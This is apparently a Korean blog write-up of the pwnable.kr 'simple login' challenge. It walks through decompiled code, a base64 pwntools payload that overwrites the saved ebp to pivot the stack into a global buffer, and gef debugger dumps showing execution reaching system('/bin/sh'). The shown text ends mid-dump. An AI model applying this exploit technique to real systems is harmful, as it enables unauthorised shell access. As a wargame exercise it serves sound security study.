{"id":3267,"date":"2025-04-10T18:57:42","date_gmt":"2025-04-10T09:57:42","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3267"},"modified":"2025-04-10T18:57:44","modified_gmt":"2025-04-10T09:57:44","slug":"simple-login","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3267","title":{"rendered":"simple login"},"content":{"rendered":"\n

Description<\/h1>\n\n\n\n
Can you get authentication from this server?\n\nssh simplelogin@pwnable.kr -p2222 (pw: guest)<\/pre>\n\n\n\n
Decompiled src<\/h1>\n\n\n\n
int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  int v4; \/\/ [esp+18h] [ebp-28h] BYREF\n  _BYTE s[30]; \/\/ [esp+1Eh] [ebp-22h] BYREF\n  unsigned int v6; \/\/ [esp+3Ch] [ebp-4h]\n\n  memset(s, 0, sizeof(s));\n  setvbuf(stdout, 0, 2, 0);\n  setvbuf(stdin, 0, 1, 0);\n  printf(\"Authenticate : \");\n  _isoc99_scanf(\"%30s\", s);\n  memset(&input, 0, 0xCu);\n  v4 = 0;\n  v6 = Base64Decode((int)s, &v4);\n  if ( v6 > 0xC )\n  {\n    puts(\"Wrong Length\");\n  }\n  else\n  {\n    memcpy(&input, v4, v6);\n    if ( auth(v6) )\n      correct();\n  }\n  return 0;\n}\n\n_BOOL4 __cdecl auth(int a1)\n{\n  _BYTE v2[8]; \/\/ [esp+14h] [ebp-14h] BYREF\n  char *s2; \/\/ [esp+1Ch] [ebp-Ch]\n  int v4; \/\/ [esp+20h] [ebp-8h] BYREF\n\n  memcpy(&v4, &input, a1);\n  s2 = (char *)calc_md5((int)v2, 12);\n  printf(\"hash : %s\\n\", s2);\n  return strcmp(\"f87cd601aa7fedca99018a8be88eda34\", s2) == 0;\n}\n\nvoid __noreturn correct()\n{\n  if ( input == 0xDEADBEEF )\n  {\n    puts(\"Congratulation! you are good!\");\n    system(\"\/bin\/sh\");\n  }\n  exit(0);\n}<\/pre>\n\n\n\n
\ucd5c\ub300 30\ubc14\uc774\ud2b8\uc758 Base64 \uc778\ucf54\ub529\ub41c \uc778\uc99d \ubb38\uc790\uc5f4\uc744 \uc785\ub825\ubc1b\uc544 s<\/code> \ubc30\uc5f4\uc5d0 \uc785\ub825\ubc1b\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
Base64Decode<\/code> \ud568\uc218\ub294 s<\/code>\uc5d0 \uc800\uc7a5\ub41c Base64 \ubb38\uc790\uc5f4\uc744 \ub514\ucf54\ub529\ud558\uc5ec, v4<\/code>\uc5d0 \uc800\uc7a5\ud558\uace0, \ub514\ucf54\ub529\ub41c \ubc14\uc774\ud2b8 \uc218\ub97c \ubc18\ud658\ud55c\ub2e4.<\/p>\n\n\n\n
\ub514\ucf54\ub529\ub41c \ub370\uc774\ud130\ub294 input<\/code> \uc804\uc5ed\ubcc0\uc218\uc5d0 \ubcf5\uc0ac\ud558\ub294\ub370 \ucd5c\ub300 0xC, 12<\/code> \ubc14\uc774\ud2b8\uae4c\uc9c0 \ubcf5\uc0ac\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
input<\/code> \uc804\uc5ed\ubcc0\uc218 \ub370\uc774\ud130\ub294 auth<\/code> \ud568\uc218\ub97c \uac70\uccd0 md5 \ud574\uc2dc\uac12\uc774 \u201cf87cd601aa7fedca99018a8be88eda34<\/code>\u201d \uc77c \uacbd\uc6b0\uc5d0 correct()<\/code> \ud568\uc218\ub97c \ud638\ucd9c\ud55c\ub2e4.<\/p>\n\n\n\n
\uc5ec\uae30\uc11c input \uac12\uc774 0xDEADBEEF<\/code>\uc5ec\uc57c \ud50c\ub798\uadf8\ub97c \ud68d\ub4dd\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
Analysis<\/h1>\n\n\n\n
_BOOL4 __cdecl auth(int a1)\n{\n  _BYTE v2[8]; \/\/ [esp+14h] [ebp-14h] BYREF\n  char *s2; \/\/ [esp+1Ch] [ebp-Ch]\n  int v4; \/\/ [esp+20h] [ebp-8h] BYREF\n\n  memcpy(&v4, &input, a1);\n  s2 = (char *)calc_md5((int)v2, 12);\n  printf(\"hash : %s\\n\", s2);\n  return strcmp(\"f87cd601aa7fedca99018a8be88eda34\", s2) == 0;\n}<\/pre>\n\n\n\n
auth<\/code> \ud568\uc218\uc560\uc11c a1<\/code>\uc740 Base64 \ub514\ucf54\ub529\ub41c \ubc14\uc774\ud2b8 \uc218\ub97c \uc758\ubbf8\ud558\uace0, input \uc804\uc5ed\ubcc0\uc218\ub294 Base64 \ub514\ucf54\ub529\ub41c \ub370\uc774\ud130\uac00 \ub4e4\uc5b4\uac04\ub2e4.<\/p>\n\n\n\n
\ubb38\uc81c\ub294 v4<\/code>\uac00 [ebp-8h]<\/code>\uc5d0 \uc704\uce58\ud574\uc788\uace0, memcpy<\/code>\ub97c \ud1b5\ud574 \ucd5c\ub300 12\ubc14\uc774\ud2b8<\/strong>\ub97c \ub36e\uc744 \uc218 \uc788\uae30 \ub54c\ubb38\uc5d0 auth\u2019s ebp<\/code>\ub97c \uc784\uc758\uc758 \uac12\uc73c\ub85c \ub36e\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
\ub2e4\uc74c\uacfc \uac19\uc774 payload<\/code>\ub97c \uad6c\uc131\ud588\uc744\ub54c auth<\/code> \ud568\uc218\uc758 \uc5d0\ud544\ub85c\uadf8 \uc911 leave<\/code> \uc5b4\uc148\ube14\ub9ac \uc218\ud589\ud558\uae30\uc804\uc744 \uc0b4\ud3b4\ubcf4\uba74<\/p>\n\n\n\n
payload = b\"A\"*4\npayload += p32(0x08049284)  #correct+0x25\npayload += p32(0x811eb40)   #input \uc804\uc5ed\ubcc0\uc218 \uc8fc\uc18c\n\n# input()\np.sendlineafter(\"Authenticate : \", base64.b64encode(payload))<\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\ubcf4\ub2e4\uc2dc\ud53c ebp<\/code> \ub808\uc9c0\uc2a4\ud130\ub97c \uc0b4\ud3b4\ubd24\uc744\ub54c, input \uc804\uc5ed\ubcc0\uc218 \uc8fc\uc18c\ub85c \ub36e\uc5b4\uc84c\ub2e4.<\/p>\n\n\n\n
[ Legend: Modified register | Code | Heap | Stack | String ]\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n$eax   : 0x0       \n$ebx   : 0x080481d0  \u2192  <_init+0000> push ebx\n$ecx   : 0xffffffff\n$edx   : 0x08e989f0  \u2192  \"5e98ff0ea70dc509487731df31af6bee\"\n$esp   : 0xff93ed80  \u2192  0x080da684  \u2192  \"f87cd601aa7fedca99018a8be88eda34\"\n$ebp   : 0xff93eda8  \u2192  0x0811eb40  \u2192  0x41414141 (\"AAAA\"?)\n$esi   : 0x0       \n$edi   : 0x0811b00c  \u2192  0x080a6470  \u2192  <__stpcpy_sse2+0000> mov edx, DWORD PTR [esp+0x4]\n$eip   : 0x0804930b  \u2192  <auth+006f> leave \n$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 IDENTIFICATION]\n$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63 \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n0xff93ed80\u2502+0x0000: 0x080da684  \u2192  \"f87cd601aa7fedca99018a8be88eda34\"\t \u2190 $esp\n0xff93ed84\u2502+0x0004: 0x08e989f0  \u2192  \"5e98ff0ea70dc509487731df31af6bee\"\n0xff93ed88\u2502+0x0008: 0x0000000c (\"\n                                 \"?)\n0xff93ed8c\u2502+0x000c: 0x08e98ab0  \u2192  0x0811b8d0  \u2192  0x08e98bf0  \u2192  0x00000000\n0xff93ed90\u2502+0x0010: 0x08e98ab0  \u2192  0x0811b8d0  \u2192  0x08e98bf0  \u2192  0x00000000\n0xff93ed94\u2502+0x0014: 0x08e989f0  \u2192  \"5e98ff0ea70dc509487731df31af6bee\"\n0xff93ed98\u2502+0x0018: 0x0000000c (\"\n                                 \"?)\n0xff93ed9c\u2502+0x001c: 0x08e989f0  \u2192  \"5e98ff0ea70dc509487731df31af6bee\"\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:x86:32 \u2500\u2500\u2500\u2500\n    0x80492ff <auth+0063>      mov    eax, 0x1\n    0x8049304 <auth+0068>      jmp    0x804930b <auth+111>\n    0x8049306 <auth+006a>      mov    eax, 0x0\n \u2192  0x804930b <auth+006f>      leave  \n    0x804930c <auth+0070>      ret    \n    0x804930d <main+0000>      push   ebp\n    0x804930e <main+0001>      mov    ebp, esp\n    0x8049310 <main+0003>      and    esp, 0xfffffff0\n    0x8049313 <main+0006>      sub    esp, 0x40\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n[#0] Id 1, Name: \"simplelogin\", stopped 0x804930b in auth (), reason: BREAKPOINT\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n[#0] 0x804930b \u2192 auth()\n[#1] 0x8049407 \u2192 main()\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ngef\u27a4  <\/pre>\n\n\n\n
\uc774\uc81c leave<\/code> \uc5b4\uc148\ube14\ub9ac\uc5b4\ub97c \uc218\ud589\ud558\uba74,<\/p>\n\n\n\n
ebp<\/code>\ub97c esp<\/code>\ub85c \uc62e\uae30\ubbc0\ub85c \u2192 ebp = 0xff93eda8, esp = 0xff93eda8 ebp<\/code>\ub97c pop<\/code>\ud558\ubbc0\ub85c \u2192 esp<\/code>\ub294 0xff93eda8 + 4 = 0xff93edac, ebp = input \uc804\uc5ed\ubcc0\uc218 \uc8fc\uc18c<\/code>\uac00 \ub41c\ub2e4.<\/p>\n\n\n\n
[ Legend: Modified register | Code | Heap | Stack | String ]\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n$eax   : 0x0       \n$ebx   : 0x080481d0  \u2192  <_init+0000> push ebx\n$ecx   : 0xffffffff\n$edx   : 0x08e989f0  \u2192  \"5e98ff0ea70dc509487731df31af6bee\"\n$esp   : 0xff93edac  \u2192  0x08049407  \u2192  <main+00fa> cmp eax, 0x1\n$ebp   : 0x0811eb40  \u2192  0x41414141 (\"AAAA\"?)\n$esi   : 0x0       \n$edi   : 0x0811b00c  \u2192  0x080a6470  \u2192  <__stpcpy_sse2+0000> mov edx, DWORD PTR [esp+0x4]\n$eip   : 0x0804930c  \u2192  <auth+0070> ret \n$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 IDENTIFICATION]\n$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63 \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n0xff93edac\u2502+0x0000: 0x08049407  \u2192  <main+00fa> cmp eax, 0x1\t \u2190 $esp\n0xff93edb0\u2502+0x0004: 0x0000000c (\"\n                                 \"?)\n0xff93edb4\u2502+0x0008: 0x08e989b8  \u2192  0x41414141\n0xff93edb8\u2502+0x000c: 0x0000000c (\"\n                                 \"?)\n0xff93edbc\u2502+0x0010: 0x00000000\n0xff93edc0\u2502+0x0014: 0x00000001\n0xff93edc4\u2502+0x0018: 0xff93ee84  \u2192  0xff9407ce  \u2192  \".\/simplelogin\"\n0xff93edc8\u2502+0x001c: 0x08e989b8  \u2192  0x41414141\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:x86:32 \u2500\u2500\u2500\u2500\n    0x8049304 <auth+0068>      jmp    0x804930b <auth+111>\n    0x8049306 <auth+006a>      mov    eax, 0x0\n    0x804930b <auth+006f>      leave  \n \u2192  0x804930c <auth+0070>      ret    \n   \u21b3   0x8049407 <main+00fa>      cmp    eax, 0x1\n       0x804940a <main+00fd>      jne    0x804941f <main+274>\n       0x804940c <main+00ff>      call   0x804925f <correct>\n       0x8049411 <main+0104>      jmp    0x804941f <main+274>\n       0x8049413 <main+0106>      mov    DWORD PTR [esp], 0x80da6ba\n       0x804941a <main+010d>      call   0x805c2d0 <puts>\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n[#0] Id 1, Name: \"simplelogin\", stopped 0x804930c in auth (), reason: SINGLE STEP\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n[#0] 0x804930c \u2192 auth()\n[#1] 0x8049407 \u2192 main()\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ngef\u27a4  <\/pre>\n\n\n\n
auth\u2018s RET<\/code>\uc740 \ub36e\uc5b4\uc368\uc84c\uc9c0 \uc54a\uc558\uae30\uc5d0 main<\/code>\uc73c\ub85c \ub2e4\uc2dc \ubcf5\uadc0\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
\uc544\ub798\ub294 main<\/code> \ud568\uc218\uc5d0\uc11c \uc5d0\ud544\ub85c\uadf8 \uc911 leave<\/code> \uc5b4\uc148\ube14\ub9ac\uc5b4 \uc218\ud589 \uc804\uc774\ub2e4.<\/p>\n\n\n\n
main\u2019s ebp<\/code>\ub294 auth<\/code> \ud568\uc218\uc5d0\uc11c ebp<\/code>\uac00 \ub36e\uc5b4\uc84c\uae30 \ub54c\ubb38\uc5d0 input \uc804\uc5ed\ubcc0\uc218 \uc8fc\uc18c<\/code>\ub85c \uadf8\ub300\ub85c \ub418\uc5b4 \uc788\ub2e4.<\/p>\n\n\n\n
[ Legend: Modified register | Code | Heap | Stack | String ]\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n$eax   : 0x0       \n$ebx   : 0x080481d0  \u2192  <_init+0000> push ebx\n$ecx   : 0xffffffff\n$edx   : 0x08e989f0  \u2192  \"5e98ff0ea70dc509487731df31af6bee\"\n$esp   : 0xff93edb0  \u2192  0x0000000c (\"\n                                     \"?)\n$ebp   : 0x0811eb40  \u2192  0x41414141 (\"AAAA\"?)\n$esi   : 0x0       \n$edi   : 0x0811b00c  \u2192  0x080a6470  \u2192  <__stpcpy_sse2+0000> mov edx, DWORD PTR [esp+0x4]\n$eip   : 0x08049424  \u2192  <main+0117> leave \n$eflags: [zero CARRY PARITY ADJUST SIGN trap INTERRUPT direction overflow resume virtualx86 IDENTIFICATION]\n$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63 \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n0xff93edb0\u2502+0x0000: 0x0000000c (\"\n                                 \"?)\t \u2190 $esp\n0xff93edb4\u2502+0x0004: 0x08e989b8  \u2192  0x41414141\n0xff93edb8\u2502+0x0008: 0x0000000c (\"\n                                 \"?)\n0xff93edbc\u2502+0x000c: 0x00000000\n0xff93edc0\u2502+0x0010: 0x00000001\n0xff93edc4\u2502+0x0014: 0xff93ee84  \u2192  0xff9407ce  \u2192  \".\/simplelogin\"\n0xff93edc8\u2502+0x0018: 0x08e989b8  \u2192  0x41414141\n0xff93edcc\u2502+0x001c: 0x55510001\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:x86:32 \u2500\u2500\u2500\u2500\n    0x8049413 <main+0106>      mov    DWORD PTR [esp], 0x80da6ba\n    0x804941a <main+010d>      call   0x805c2d0 <puts>\n    0x804941f <main+0112>      mov    eax, 0x0\n \u2192  0x8049424 <main+0117>      leave  \n    0x8049425 <main+0118>      ret    \n    0x8049426                  xchg   ax, ax\n    0x8049428                  xchg   ax, ax\n    0x804942a                  xchg   ax, ax\n    0x804942c                  xchg   ax, ax\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n[#0] Id 1, Name: \"simplelogin\", stopped 0x8049424 in main (), reason: SINGLE STEP\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n[#0] 0x8049424 \u2192 main()\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ngef\u27a4  <\/pre>\n\n\n\n
\uc774\uc81c \uc5ec\uae30\uc11c\ub3c4 leave<\/code>\ub97c \uc218\ud589\ud558\uac8c \ub418\uba74,<\/p>\n\n\n\n
ebp<\/code>\ub97c esp<\/code>\ub85c \uc62e\uae30\ubbc0\ub85c \u2192 ebp = 0x0811eb40, esp = 0x0811eb40 ebp<\/code>\ub97c pop<\/code>\ud558\ubbc0\ub85c \u2192 esp<\/code>\ub294 0x0811eb40 + 4 = 0x0811eb44, ebp = 0x41414141<\/code>\uc774 \ub41c\ub2e4.<\/p>\n\n\n\n
\uc5ec\uae30\uc11c RET<\/code>\uc744 \uc218\ud589\ud558\uac8c \ub418\uba74, eip<\/code>\ub294 input + 0x4<\/code> \uc9c0\uc810\uc744 \uac00\ub9ac\ud0a4\uac8c \ub418\ubbc0\ub85c system(\u201dbin\/sh\u201d)<\/code> \uc5b4\uc148\ube14\ub9ac \uc8fc\uc18c\uc778 0x0811eb40<\/code> \uc8fc\uc18c\ub85c \uc774\ub3d9\ud558\uc5ec \ud50c\ub798\uadf8\ub97c \uc5bb\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
[ Legend: Modified register | Code | Heap | Stack | String ]\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n$eax   : 0x0       \n$ebx   : 0x080481d0  \u2192  <_init+0000> push ebx\n$ecx   : 0xffffffff\n$edx   : 0x08e989f0  \u2192  \"5e98ff0ea70dc509487731df31af6bee\"\n$esp   : 0x0811eb44  \u2192  0x08049284  \u2192  <correct+0025> mov DWORD PTR [esp], 0x80da66f\n$ebp   : 0x41414141 (\"AAAA\"?)\n$esi   : 0x0       \n$edi   : 0x0811b00c  \u2192  0x080a6470  \u2192  <__stpcpy_sse2+0000> mov edx, DWORD PTR [esp+0x4]\n$eip   : 0x08049425  \u2192  <main+0118> ret \n$eflags: [zero CARRY PARITY ADJUST SIGN trap INTERRUPT direction overflow resume virtualx86 IDENTIFICATION]\n$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63 \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n0x0811eb44\u2502+0x0000: 0x08049284  \u2192  <correct+0025> mov DWORD PTR [esp], 0x80da66f\t \u2190 $esp\n0x0811eb48\u2502+0x0004: 0x0811eb40  \u2192  0x41414141\n0x0811eb4c\u2502+0x0008: 0x00000000\n0x0811eb50\u2502+0x000c: 0x078bfffd\n0x0811eb54\u2502+0x0010: 0x80002001\n0x0811eb58\u2502+0x0014: 0x00000000\n0x0811eb5c\u2502+0x0018: 0x00000000\n0x0811eb60\u2502+0x001c: 0x00000028 